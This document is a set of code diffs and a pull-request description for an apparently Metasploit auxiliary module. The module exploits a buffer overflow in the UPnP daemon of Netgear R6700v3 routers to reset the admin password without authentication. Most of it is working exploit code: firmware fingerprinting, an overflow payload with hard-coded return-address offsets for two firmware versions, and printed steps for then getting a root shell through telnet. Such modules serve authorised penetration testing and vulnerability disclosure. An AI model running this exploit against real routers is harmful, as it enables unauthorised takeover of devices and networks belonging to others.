-        not need any authentication to abuse it. After exploitation, an attacker can hijack execution of the upnpd binary,
-        and reset the router's administrative password to the factory default of "password".
+          The vulnerability can only be exploited by an attacker on the LAN side of the router, but the attacker does
+          not need any authentication to abuse it. After exploitation, an attacker can hijack execution of the upnpd binary,
+          and reset the router's administrative password to the factory default of "password".
 
-        Once this is done, attackers can use the exploit/linux/telnet/netgear_telnetenable module to send a
-        special packet to port 23/udp of the router to enable a telnet server on port 23/tcp. The attacker can
-        then log into this telnet server using the new password, and obtain a shell as the "root" user.
+          Once this is done, attackers can use the exploit/linux/telnet/netgear_telnetenable module to send a
+          special packet to port 23/udp of the router to enable a telnet server on port 23/tcp. The attacker can
+          then log into this telnet server using the new password, and obtain a shell as the "root" user.
 
-        These last two steps have to be done manually, as the authors did not reverse the communication with the web interface.
-        It should be noted that successful exploitation will result in the upnpd binary crashing on the target router.
-        As the upnpd binary will not restart until the router is rebooted, this means that attackers can only exploit
-        this vulnerability once per reboot of the router.
+          These last two steps have to be done manually, as the authors did not reverse the communication with the web interface.
+          It should be noted that successful exploitation will result in the upnpd binary crashing on the target router.
+          As the upnpd binary will not restart until the router is rebooted, this means that attackers can only exploit
+          this vulnerability once per reboot of the router.
 
-        This vulnerability was discovered and exploited at Pwn2Own Tokyo 2019 by the Flashback team (Pedro Ribeiro +
-        Radek Domanski).
+          This vulnerability was discovered and exploited at Pwn2Own Tokyo 2019 by the Flashback team (Pedro Ribeiro +
+          Radek Domanski).
         },
-        'License'        => MSF_LICENSE,
-        'Author'         =>
+        'License' => MSF_LICENSE,
+        'Author' =>
         [
           'Pedro Ribeiro <pedrib[at]gmail.com>', # Twitter: @pedrib1337. Vulnerability discovery and Metasploit module
           'Radek Domanski <radek.domanski[at]gmail.com>', # Twitter: @RabbitPro. Vulnerability discovery and Metasploit module
           'gwillcox-r7' # Minor general updates plus updated implementation of the check method to identify a wider range of vulnerable targets.
         ],
-        'References'     =>
+        'References' =>
           [
             [ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/Pwn2Own/Tokyo_2019/tokyo_drift/tokyo_drift.md'],
             [ 'URL', 'https://kb.netgear.com/000061982/Security-Advisory-for-Multiple-Vulnerabilities-on-Some-Routers-Mobile-Routers-Modems-Gateways-and-Extenders'],
@@ -48,118 +48,119 @@ class MetasploitModule < Msf::Auxiliary
             [ 'ZDI', '20-704']
           ],
         'Notes' => # Note that reliability isn't included here, as technically the exploit can only
-                   # only be run once, after which the service crashes.
+            # only be run once, after which the service crashes.
             {
-                'SideEffects' => [ CONFIG_CHANGES ], # This module will change the configuration by
-                                                     # resetting the router to the default factory password.
-                'Stability' => [ CRASH_SERVICE_DOWN ] # This module will crash the target service after it is run.
+              'SideEffects' => [ CONFIG_CHANGES ], # This module will change the configuration by
+              # resetting the router to the default factory password.
+              'Stability' => [ CRASH_SERVICE_DOWN ] # This module will crash the target service after it is run.
             },
         'RelatedModules' => [ 'exploit/linux/telnet/netgear_telnetenable' ], # This module relies on users also running exploit/linux/telnet/netgear_telnetenable to get the shell.
-        'DisclosureDate' => "Jun 15 2020",
-        'DefaultTarget'   => 0,
+        'DisclosureDate' => 'Jun 15 2020',
+        'DefaultTarget' => 0
       )
     )
     register_options(
       [
         Opt::RPORT(5000)
-      ])
+      ]
+    )
   end
 
-  def get_version
+  def retrieve_version
     soap =
-    "<?xml version=\"1.0\"?>"\
-    "\r\n<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">"\
-    "\r\n<SOAP-ENV:Body>"\
-    "\r\nSetDeviceNameIconByMAC"\
-    "\r\n<NewBlockSiteName>1"\
-    "\r\n</NewBlockSiteName>"\
-    "\r\n</SOAP-ENV:Body>"\
-    "\r\n</SOAP-ENV:Envelope>"
+      '<?xml version="1.0"?>'\
+      "\r\n<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">"\
+      "\r\n<SOAP-ENV:Body>"\
+      "\r\nSetDeviceNameIconByMAC"\
+      "\r\n<NewBlockSiteName>1"\
+      "\r\n</NewBlockSiteName>"\
+      "\r\n</SOAP-ENV:Body>"\
+      "\r\n</SOAP-ENV:Envelope>"
 
     # the GetInfo method will helpfully report the firmware version to an unauth request
-    headers = "SOAPAction: urn:NETGEAR-ROUTER:service:DeviceInfo:1#GetInfo"
+    headers = 'SOAPAction: urn:NETGEAR-ROUTER:service:DeviceInfo:1#GetInfo'
 
     res = send_request_cgi({
       'uri' => '/soap/server_sa',
-      'method'  => 'POST',
-      'raw_headers'  => headers,
-      'data'  => soap
+      'method' => 'POST',
+      'raw_headers' => headers,
+      'data' => soap
     })
 
-    if (res == nil)
+    if res.nil?
       fail_with(Failure::Unreachable, "Failed to obtain device version: Target didn't respond")
-    elsif (res.body.to_s == "") or (res.code != 200)
-      fail_with(Failure::UnexpectedReply, "Failed to obtain device version: Unexpected response code")
+    elsif (res.body.to_s == '') || (res.code != 200)
+      fail_with(Failure::UnexpectedReply, 'Failed to obtain device version: Unexpected response code')
     end
 
     version = res.body.to_s
     version = version.scan(/V\d\.\d\.\d\.\d{1,2}/) # Try find a version number in the format V1.2.3.48 or similar.
-    if (version == nil) # Check we actually got a result.
-      fail_with(Failure::UnexpectedReply, "Failed to obtain device version: no version number found in response") # Taken from https://stackoverflow.com/questions/4115115/extract-a-substring-from-a-string-in-ruby-using-a-regular-expression
+    if version.nil? # Check we actually got a result.
+      fail_with(Failure::UnexpectedReply, 'Failed to obtain device version: no version number found in response') # Taken from https://stackoverflow.com/questions/4115115/extract-a-substring-from-a-string-in-ruby-using-a-regular-expression
     end
-    raw_version_number = version[0].gsub("V", "") # If we got a result, then take the first result from the returned array, and remove the leading 'V'.
+    raw_version_number = version[0].gsub('V', '') # If we got a result, then take the first result from the returned array, and remove the leading 'V'.
     Gem::Version.new(raw_version_number) # Finally lets turn it into a Gem::Version object for later use in other parts of the code.
   end
 
   def check
-    target_version = get_version
+    target_version = retrieve_version
     print_status("Target is running firmware version #{target_version}")
-    if (target_version < Gem::Version.new("1.0.4.94"))  && (target_version >= Gem::Version.new("1.0.2.62"))
+    if (target_version < Gem::Version.new('1.0.4.94')) && (target_version >= Gem::Version.new('1.0.2.62'))
       return Exploit::CheckCode::Appears
     else
       return Exploit::Checkcode::Safe
     end
   end
 
-  def get_offset
-    target_version = get_version
-    if target_version == Gem::Version.new("1.0.4.84")
+  def find_offset
+    target_version = retrieve_version
+    if target_version == Gem::Version.new('1.0.4.84')
       print_status("#{peer} - Identified Netgear R6700v3 (firmware V1.0.0.4.84_10.0.58) as the target.")
       # this offset is where execution will jump to
       # a part in the middle of the binary that resets the admin password
       return "\x58\x9a\x03"
-    elsif target_version == Gem::Version.new("1.0.4.82")
+    elsif target_version == Gem::Version.new('1.0.4.82')
       print_status("#{peer} - Identified Netgear R6700v3 (firmware V1.0.0.4.82_10.0.57) as the target.")
       return "\x48\x9a\x03"
     end
   end
 
   def run
-    offset = get_offset
-    if not offset
-      fail_with(Failure::NoTarget, "Identified firmware version is not supported. Please contact the authors.")
+    offset = find_offset
+    if !offset
+      fail_with(Failure::NoTarget, 'Identified firmware version is not supported. Please contact the authors.')
     end
 
     headers =
-    "SOAPAction: urn:NETGEAR-ROUTER:service:DeviceConfig:1#SOAPLogin\nSOAPAction: urn:NETGEAR-ROUTER:service:DeviceInfo:1#Whatever"
+      "SOAPAction: urn:NETGEAR-ROUTER:service:DeviceConfig:1#SOAPLogin\nSOAPAction: urn:NETGEAR-ROUTER:service:DeviceInfo:1#Whatever"
 
     payload =
-    "<?xml version=\"1.0\"?>"\
-    "\r\n<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">"\
-    "\r\n<SOAP-ENV:Body>"\
-    "\r\nSetDeviceNameIconByMAC"\
-    "\r\n<NewBlockSiteName>1"
+      '<?xml version="1.0"?>'\
+      "\r\n<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">"\
+      "\r\n<SOAP-ENV:Body>"\
+      "\r\nSetDeviceNameIconByMAC"\
+      "\r\n<NewBlockSiteName>1"
 
     # filler
-    payload += Rex::Text::rand_text_alpha(1028)
+    payload += Rex::Text.rand_text_alpha(1028)
     # $r4
-    payload += Rex::Text::rand_text_alpha(4)
+    payload += Rex::Text.rand_text_alpha(4)
     # $r5
-    payload += Rex::Text::rand_text_alpha(4)
+    payload += Rex::Text.rand_text_alpha(4)
     # $r6
-    payload += Rex::Text::rand_text_alpha(4)
+    payload += Rex::Text.rand_text_alpha(4)
     # $r7
-    payload += Rex::Text::rand_text_alpha(4)
+    payload += Rex::Text.rand_text_alpha(4)
     # $r8
-    payload += Rex::Text::rand_text_alpha(4)
+    payload += Rex::Text.rand_text_alpha(4)
     # $lr (AKA return address)
     payload += offset
 
     # trailer
     payload +=
-    "\r\n</NewBlockSiteName>"\
-    "\r\n</SOAP-ENV:Body>"\
-    "\r\n</SOAP-ENV:Envelope>"
+      "\r\n</NewBlockSiteName>"\
+      "\r\n</SOAP-ENV:Body>"\
+      "\r\n</SOAP-ENV:Envelope>"
 
     headers.gsub! "\n", "\r\n"
     payload.gsub! "\n", "\r\n"
@@ -170,9 +171,9 @@ class MetasploitModule < Msf::Auxiliary
 
     res = send_request_cgi({
       'uri' => '/soap/server_sa',
-      'method'  => 'POST',
-      'raw_headers'  => headers,
-      'data'  => payload
+      'method' => 'POST',
+      'raw_headers' => headers,
+      'data' => payload
     })
 
     if res
@@ -180,11 +181,11 @@ class MetasploitModule < Msf::Auxiliary
       fail_with(Failure::UnexpectedReply, 'Failed to send HTTP payload... try again?')
     else
       print_good("#{peer} - HTTP payload sent! 'admin' password has been reset to 'password'")
-      print_status("To achieve code execution, do the following steps manually:")
+      print_status('To achieve code execution, do the following steps manually:')
       print_status("1- Login to #{rhost} with creds 'admin:password', then:")
       print_status("\t1.1- go to Advanced -> Administration -> Set Password")
       print_status("\t1.2- Change the password from 'password' to <WHATEVER>")
-      print_status("2- Run metasploit as root, then:")
+      print_status('2- Run metasploit as root, then:')
       print_status("\t2.1- use exploit/linux/telnet/netgear_telnetenable")
       print_status("\t2.2- set interface <INTERFACE_CONNECTED_TO_ROUTER>")
       print_status("\t2.3- set rhost #{rhost}")
@@ -193,7 +194,7 @@ class MetasploitModule < Msf::Auxiliary
       print_status("\t2.5- OPTIONAL: set timeout 1500")
       print_status("\t2.6- OPTIONAL: set MAC <ROUTERS_MAC>")
       print_status("\t2.7- run it and login with 'admin:<WHATEVER>'")
-      print_status("3- Enjoy your root shell!")
+      print_status('3- Enjoy your root shell!')
     end
   end
 end

--- a/modules/auxiliary/admin/http/netgear_r6700_pass_reset.rb
+++ b/modules/auxiliary/admin/http/netgear_r6700_pass_reset.rb
@@ -29,11 +29,12 @@ class MetasploitModule < Msf::Auxiliary
         'Author'         =>
         [
           'Pedro Ribeiro <pedrib[at]gmail.com>', # Twitter: @pedrib1337. Vulnerability discovery and Metasploit module
-          'Radek Domanski <radek.domanski[at]gmail.com>'      # Twitter: @RabbitPro. Vulnerability discovery and Metasploit module
+          'Radek Domanski <radek.domanski[at]gmail.com>' # Twitter: @RabbitPro. Vulnerability discovery and Metasploit module
         ],
         'References'     =>
           [
             [ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/Pwn2Own/Tokyo_2019/tokyo_drift/tokyo_drift.md'],
+            [ 'URL', 'https://kb.netgear.com/000061982/Security-Advisory-for-Multiple-Vulnerabilities-on-Some-Routers-Mobile-Routers-Modems-Gateways-and-Extenders'],
             [ 'CVE', 'YYYY-XXXXX'],
             [ 'ZDI', '20-703'],
             [ 'ZDI', '20-704']
@@ -69,7 +70,11 @@ class MetasploitModule < Msf::Auxiliary
       'data'  => soap
     })
 
-    fail_with(Failure::Unknown, 'Failed to obtain DeviceInfo:1#GetInfo') unless res && res.code == 200
+    if (res == nil)
+      fail_with(Failure::Unreachable, "Failed to obtain device version: target didn't respond")
+    elsif (res.code != 200)
+      fail_with(Failure::UnexpectedReply, "Failed to obtain device version: unexpected response code")
+    end
 
     if res.body.to_s =~ /V1.0.4.84/
       print_status("#{peer} - Identified Netgear R6700v3 (firmware V1.0.0.4.84_10.0.58) as the target.")

--- a/modules/auxiliary/admin/http/netgear_r6700_pass_reset.rb
+++ b/modules/auxiliary/admin/http/netgear_r6700_pass_reset.rb
@@ -12,15 +12,15 @@ class MetasploitModule < Msf::Auxiliary
         info,
         'Name' => 'Netgear R6700v3 Unauthenticated LAN Admin Password Reset',
         'Description' => %q{
-          This module exploits a buffer overflow vulnerability in the UPNP daemon (/usr/sbin/upnpd), running on
-          the router Netgear R6700 Nighthawk, hardware version 3, ARM Architecture, firmware versions V1.0.0.4.82_10.0.57
-          and V1.0.0.4.84_10.0.58.
+          This module targets ZDI-20-704 (aka CVE-2020-10924), a buffer overflow vulnerability in the UPNP daemon (/usr/sbin/upnpd),
+          on Netgear R6700v3 routers running firmware versions from V1.0.2.62 up to but not including V1.0.4.94, to reset
+          the password for the 'admin' user back to its factory default of 'password'. Authentication is bypassed by
+          using ZDI-20-703 (aka CVE-2020-10923), an authentication bypass that occurs when network adjacent
+          computers send SOAPAction UPnP messages to a vulnerable Netgear R6700v3 router. Currently this module only
+          supports exploiting Netgear R6700v3 routers running either the V1.0.0.4.82_10.0.57 or V1.0.0.4.84_10.0.58
+          firmware, however support for other firmware versions may be added in the future.
 
-          The vulnerability can only be exploited by an attacker on the LAN side of the router, but the attacker does
-          not need any authentication to abuse it. After exploitation, an attacker can hijack execution of the upnpd binary,
-          and reset the router's administrative password to the factory default of "password".
-
-          Once this is done, attackers can use the exploit/linux/telnet/netgear_telnetenable module to send a
+          Once the password has been reset, attackers can use the exploit/linux/telnet/netgear_telnetenable module to send a
           special packet to port 23/udp of the router to enable a telnet server on port 23/tcp. The attacker can
           then log into this telnet server using the new password, and obtain a shell as the "root" user.
 
@@ -43,7 +43,8 @@ class MetasploitModule < Msf::Auxiliary
           [
             [ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/Pwn2Own/Tokyo_2019/tokyo_drift/tokyo_drift.md'],
             [ 'URL', 'https://kb.netgear.com/000061982/Security-Advisory-for-Multiple-Vulnerabilities-on-Some-Routers-Mobile-Routers-Modems-Gateways-and-Extenders'],
-            [ 'CVE', 'YYYY-XXXXX'],
+            [ 'CVE', '2020-10923'],
+            [ 'CVE', '2020-10924'],
             [ 'ZDI', '20-703'],
             [ 'ZDI', '20-704']
           ],

--- a/modules/auxiliary/admin/http/netgear_r6700_pass_reset.rb
+++ b/modules/auxiliary/admin/http/netgear_r6700_pass_reset.rb
@@ -1,0 +1,167 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'           => 'Netgear R6700v3 Unauthenticated LAN Remote Code Execution',
+        'Description'    => %q{
+        This module exploits a buffer overflow vulnerability in the UPNP daemon (/usr/sbin/upnpd), running on
+        the router Netgear R6700 Nighthawk, hardware version 3, ARM Architecture, firmware versions V1.0.0.4.82_10.0.57 and
+        V1.0.0.4.84_10.0.58.
+        The vulnerability can only be exploited by an attacker on the LAN side of the router, but the attacker does
+        not need any authentication to abuse it. After exploitation, an attacker can hijack execution of the upnpd binary,
+        and reset the router's administrative password to "password". Next, a special packet to port 23/udp is sent
+        which will enable a telnet server on port 23/tcp. The attacker can then login to this telnet server using the new password,
+        and obtain a root shell.
+        These last two steps have to be done manually, as the authors did not reverse the communication with the web interface.
+        It should be noted that it is likely that earlier firmware versions are also vulnerable to this attack.
+        This vulnerability was discovered and exploited at Pwn2Own Tokyo 2019 by the Flashback team (Pedro Ribeiro +
+        Radek Domanski).
+        },
+        'License'        => MSF_LICENSE,
+        'Author'         =>
+        [
+          'Pedro Ribeiro (@pedrib1337 | pedrib@gmail.com)',             # Vulnerability discovery and Metasploit module
+          'Radek Domanski (@RabbitPro | radek.domanski@gmail.com)'      # Vulnerability discovery and Metasploit module
+        ],
+        'References'     =>
+          [
+            [ 'URL', '<TODO>'],
+            [ 'CVE', 'YYYY-XXXXX'],
+            [ 'ZDI', '20-703'],
+            [ 'ZDI', '20-704']
+          ],
+        'DisclosureDate' => "Jun 15 2020",
+        'DefaultTarget'   => 0,
+      )
+    )
+    register_options(
+      [
+        Opt::RPORT(5000)
+      ])
+  end
+
+  def get_offset
+    soap =
+    "<?xml version=\"1.0\"?>"\
+    "\r\n<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">"\
+    "\r\n<SOAP-ENV:Body>"\
+    "\r\nSetDeviceNameIconByMAC"\
+    "\r\n<NewBlockSiteName>1"\
+    "\r\n</NewBlockSiteName>"\
+    "\r\n</SOAP-ENV:Body>"\
+    "\r\n</SOAP-ENV:Envelope>"
+
+    # the GetInfo method will helpfully report the firmware version to an unauth request
+    headers = "SOAPAction: urn:NETGEAR-ROUTER:service:DeviceInfo:1#GetInfo"
+
+    res = send_request_cgi({
+      'uri' => 'soap/server_sa HTTP/1.1',
+      'method'  => 'POST',
+      'raw_headers'  => headers,
+      'data'  => soap
+    })
+
+    fail_with(Failure::Unknown, 'Failed to obtain DeviceInfo:1#GetInfo') unless res && res.code == 200
+
+    if res.body.to_s =~ /V1.0.4.84/
+      print_status("#{peer} - Identified Netgear R6700v3 (firmware V1.0.0.4.84_10.0.58) as the target.")
+      # this offset is where execution will jump to
+      # a part in the middle of the binary that resets the admin password
+      return "\x58\x9a\x03"
+    elsif res.body.to_s =~ /V1.0.4.82/
+      print_status("#{peer} - Identified Netgear R6700v3 (firmware V1.0.0.4.82_10.0.57) as the target.")
+      return "\x48\x9a\x03"
+    end
+  end
+
+  def check
+    if get_offset
+      return Exploit::CheckCode::Vulnerable
+    else
+      return Exploit::CheckCode::Unknown
+    end
+  end
+
+  def run
+    offset = get_offset
+    if not offset
+      fail_with(Failure::Unknown, "Unknown firmware version, can't proceed")
+    end
+
+    if not offset
+      fail_with(Failure::Unknown, 'Failed to obtain target version')
+    end
+
+    headers =
+    "SOAPAction: urn:NETGEAR-ROUTER:service:DeviceConfig:1#SOAPLogin\nSOAPAction: urn:NETGEAR-ROUTER:service:DeviceInfo:1#Whatever"
+
+    payload =
+    "<?xml version=\"1.0\"?>"\
+    "\r\n<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">"\
+    "\r\n<SOAP-ENV:Body>"\
+    "\r\nSetDeviceNameIconByMAC"\
+    "\r\n<NewBlockSiteName>1"
+
+    # filler
+    payload += Rex::Text::rand_text_alpha(1028)
+    # $r4
+    payload += Rex::Text::rand_text_alpha(4)
+    # $r5
+    payload += Rex::Text::rand_text_alpha(4)
+    # $r6
+    payload += Rex::Text::rand_text_alpha(4)
+    # $r7
+    payload += Rex::Text::rand_text_alpha(4)
+    # $r8
+    payload += Rex::Text::rand_text_alpha(4)
+    # $lr (AKA return address)
+    payload += offset
+
+    # trailer
+    payload +=
+    "\r\n</NewBlockSiteName>"\
+    "\r\n</SOAP-ENV:Body>"\
+    "\r\n</SOAP-ENV:Envelope>"
+
+    headers.gsub! "\n", "\r\n"
+    payload.gsub! "\n", "\r\n"
+
+    # MSF adds content len automatically.
+    # Unfortunately this appears before the raw headers hash, but doesn't appear to have ill effects
+    headers += "\r\n"
+
+    res = send_request_cgi({
+      'uri' => 'soap/server_sa HTTP/1.1',
+      'method'  => 'POST',
+      'raw_headers'  => headers,
+      'data'  => payload
+    })
+
+    if res
+      # no response is received in case of success
+      fail_with(Failure::Unknown, 'Failed to send HTTP payload... try again?')
+    else
+      print_good("#{peer} - HTTP payload sent! 'admin' password has been reset to 'password'")
+      print_status("To achieve code execution, do the following steps manually:")
+      print_status("1- Login to #{rhost} with creds 'admin:password', then:")
+      print_status("\t1.1- go to Advanced -> Administration -> Set Password")
+      print_status("\t1.2- Change the password from 'password' to <WHATEVER>")
+      print_status("2- Run metasploit as root, then:")
+      print_status("\t2.1- use exploit/linux/telnet/netgear_telnetenable")
+      print_status("\t2.2- set interface <INTERFACE_CONNECTED_TO_ROUTER>")
+      print_status("\t2.3- set rhost #{rhost}")
+      print_status("\t2.3- set username admin")
+      print_status("\t2.4- set password <WHATEVER>")
+      print_status("\t2.5- run it and login with 'admin:<WHATEVER>'")
+      print_status("3- Enjoy your root shell!")
+    end
+  end
+end

--- a/modules/auxiliary/admin/http/netgear_r6700_pass_reset.rb
+++ b/modules/auxiliary/admin/http/netgear_r6700_pass_reset.rb
@@ -33,7 +33,8 @@ class MetasploitModule < Msf::Auxiliary
         ],
         'References'     =>
           [
-            [ 'URL', '<TODO>'],
+            [ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/Pwn2Own/Tokyo_2019/tokyo_drift/tokyo_drift.md'],
+            [ 'URL', 'https://github.com/rdomanski/Exploits_and_Advisories/blob/master/advisories/Pwn2Own/Tokyo2019/tokyo_drift.md'],
             [ 'CVE', 'YYYY-XXXXX'],
             [ 'ZDI', '20-703'],
             [ 'ZDI', '20-704']
@@ -63,7 +64,7 @@ class MetasploitModule < Msf::Auxiliary
     headers = "SOAPAction: urn:NETGEAR-ROUTER:service:DeviceInfo:1#GetInfo"
 
     res = send_request_cgi({
-      'uri' => 'soap/server_sa HTTP/1.1',
+      'uri' => '/soap/server_sa',
       'method'  => 'POST',
       'raw_headers'  => headers,
       'data'  => soap
@@ -93,11 +94,7 @@ class MetasploitModule < Msf::Auxiliary
   def run
     offset = get_offset
     if not offset
-      fail_with(Failure::Unknown, "Unknown firmware version, can't proceed")
-    end
-
-    if not offset
-      fail_with(Failure::Unknown, 'Failed to obtain target version')
+      fail_with(Failure::Unknown, "Unknown firmware version, can't proceed, please contact the authors")
     end
 
     headers =
@@ -139,7 +136,7 @@ class MetasploitModule < Msf::Auxiliary
     headers += "\r\n"
 
     res = send_request_cgi({
-      'uri' => 'soap/server_sa HTTP/1.1',
+      'uri' => '/soap/server_sa',
       'method'  => 'POST',
       'raw_headers'  => headers,
       'data'  => payload

--- a/modules/auxiliary/admin/http/netgear_r6700_pass_reset.rb
+++ b/modules/auxiliary/admin/http/netgear_r6700_pass_reset.rb
@@ -28,13 +28,12 @@ class MetasploitModule < Msf::Auxiliary
         'License'        => MSF_LICENSE,
         'Author'         =>
         [
-          'Pedro Ribeiro (@pedrib1337 | pedrib@gmail.com)',             # Vulnerability discovery and Metasploit module
-          'Radek Domanski (@RabbitPro | radek.domanski@gmail.com)'      # Vulnerability discovery and Metasploit module
+          'Pedro Ribeiro <pedrib[at]gmail.com>', # Twitter: @pedrib1337. Vulnerability discovery and Metasploit module
+          'Radek Domanski <radek.domanski[at]gmail.com>'      # Twitter: @RabbitPro. Vulnerability discovery and Metasploit module
         ],
         'References'     =>
           [
             [ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/Pwn2Own/Tokyo_2019/tokyo_drift/tokyo_drift.md'],
-            [ 'URL', 'https://github.com/rdomanski/Exploits_and_Advisories/blob/master/advisories/Pwn2Own/Tokyo2019/tokyo_drift.md'],
             [ 'CVE', 'YYYY-XXXXX'],
             [ 'ZDI', '20-703'],
             [ 'ZDI', '20-704']
@@ -144,7 +143,7 @@ class MetasploitModule < Msf::Auxiliary
 
     if res
       # no response is received in case of success
-      fail_with(Failure::Unknown, 'Failed to send HTTP payload... try again?')
+      fail_with(Failure::UnexpectedReply, 'Failed to send HTTP payload... try again?')
     else
       print_good("#{peer} - HTTP payload sent! 'admin' password has been reset to 'password'")
       print_status("To achieve code execution, do the following steps manually:")

--- a/modules/auxiliary/admin/http/netgear_r6700_pass_reset.rb
+++ b/modules/auxiliary/admin/http/netgear_r6700_pass_reset.rb
@@ -18,9 +18,11 @@ class MetasploitModule < Msf::Auxiliary
 
         The vulnerability can only be exploited by an attacker on the LAN side of the router, but the attacker does
         not need any authentication to abuse it. After exploitation, an attacker can hijack execution of the upnpd binary,
-        and reset the router's administrative password to "password". Next, a special packet to port 23/udp is sent
-        which will enable a telnet server on port 23/tcp. The attacker can then login to this telnet server using the
-        new password, and obtain a root shell.
+        and reset the router's administrative password to the factory default of "password".
+
+        Once this is done, attackers can use the exploit/linux/telnet/netgear_telnetenable module to send a
+        special packet to port 23/udp of the router to enable a telnet server on port 23/tcp. The attacker can
+        then log into this telnet server using the new password, and obtain a shell as the "root" user.
 
         These last two steps have to be done manually, as the authors did not reverse the communication with the web interface.
         It should be noted that successful exploitation will result in the upnpd binary crashing on the target router.


### PR DESCRIPTION
This module exploits a buffer overflow vulnerability in the upnpd daemon (/usr/sbin/upnpd), running on the router Netgear R6700v3, ARM Architecture, firmware version V1.0.4.82_10.0.57 and V1.0.4.84_10.0.58.
The vulnerability can only be exploited by an attacker on the LAN side of the router, but the attacker does not need any authentication to abuse it. After exploitation, an attacker will be able to use a default admin password to login to web interface and use a 'telnetenable' module to gain root shell.

This vulnerability was discovered and exploited at Pwn2Own Tokyo 2019 by the team Flashback (Pedro Ribeiro + Radek Domanski).
